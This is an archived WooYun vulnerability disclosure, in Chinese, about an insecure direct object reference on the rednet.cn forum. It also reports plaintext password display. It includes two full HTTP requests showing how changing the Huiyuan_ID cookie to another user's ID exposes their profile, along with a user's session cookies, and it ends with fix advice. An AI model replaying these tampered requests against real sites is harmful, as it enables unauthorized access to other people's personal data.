乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-23: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-06-07: 厂商已经主动忽略漏洞,细节向公众公开
红网论坛存在横向越权漏洞,可以随意浏览他人个人资料。且修改密码时新密码明文显示在界面,注册成功后密码也明文回显。
修改个人资料request,用户身份通过客户端cookie中的ID参数提取:
GET /EditInfor.asp HTTP/1.1Host: people.rednet.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://people.rednet.cn/EditInfor.aspCookie: Hm_lvt_fe4dc1c3f2f427e38ab444c0482ad49d=1429281476,1429369366,1429369682,1429369859; wdcid=338db40657044830; wdlast=1429369888; vjuids=67c7909da.14cc7d09008.0.89455f3a1acd9; vjlast=1429281477.1429368736.13; hiido_tod=17; hiido_ui=0.7879002586247603; hiido_lv=1429368739125; hiido_ti=1429369891704; ASPSESSIONIDSQSTCCDA=IMPOBJHAFAOJNGKJNMADGNNN; Hm_lpvt_fe4dc1c3f2f427e38ab444c0482ad49d=1429369888; wz%5Ftype=; wz%5Fuser%5FLingdaoId=; wz%5Fuser%5FlastLoginDatetime=; wz%5Fuser%5FLoginTimes=; wz%5Fuser%5FTrueName=; wz%5FUser%5Fpass=; wz%5FUser%5FIdName=; wz%5FUser%5FID=; peopleRednet2010=userinfo=tonylee123%40%401847100837f9a043%40%40482ff55ab7bed6efd4c1b238ceb42688&Huiyuan%5FIsLogin=yes&Huiyuan%5FLastLoginDatetime=2015%2F4%2F18+23%3A01%3A52&Huiyuan%5FLoginTimes=10&Huiyuan%5FIdName=tonylee123&Huiyuan%5FID=465825Connection: keep-alive
修改用户ID=1
GET /EditInfor.asp HTTP/1.1Host: people.rednet.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://people.rednet.cn/EditInfor.aspCookie: Hm_lvt_fe4dc1c3f2f427e38ab444c0482ad49d=1429281476,1429369366,1429369682,1429369859; wdcid=338db40657044830; wdlast=1429369888; vjuids=67c7909da.14cc7d09008.0.89455f3a1acd9; vjlast=1429281477.1429368736.13; hiido_tod=17; hiido_ui=0.7879002586247603; hiido_lv=1429368739125; hiido_ti=1429369891704; ASPSESSIONIDSQSTCCDA=IMPOBJHAFAOJNGKJNMADGNNN; Hm_lpvt_fe4dc1c3f2f427e38ab444c0482ad49d=1429369888; wz%5Ftype=; wz%5Fuser%5FLingdaoId=; wz%5Fuser%5FlastLoginDatetime=; wz%5Fuser%5FLoginTimes=; wz%5Fuser%5FTrueName=; wz%5FUser%5Fpass=; wz%5FUser%5FIdName=; wz%5FUser%5FID=; peopleRednet2010=userinfo=tonylee123%40%401847100837f9a043%40%40482ff55ab7bed6efd4c1b238ceb42688&Huiyuan%5FIsLogin=yes&Huiyuan%5FLastLoginDatetime=2015%2F4%2F18+23%3A01%3A52&Huiyuan%5FLoginTimes=10&Huiyuan%5FIdName=tonylee123&Huiyuan%5FID=1Connection: keep-alive
获得他人资料:
密码输入界面,新密码明文显示
注册成功后密码明文回显
建议从会话中提取用户信息。密码修改输入新密码需隐藏,注册成功不要明文回显密码。
未能联系到厂商或者厂商积极拒绝
漏洞Rank:8 (WooYun评价)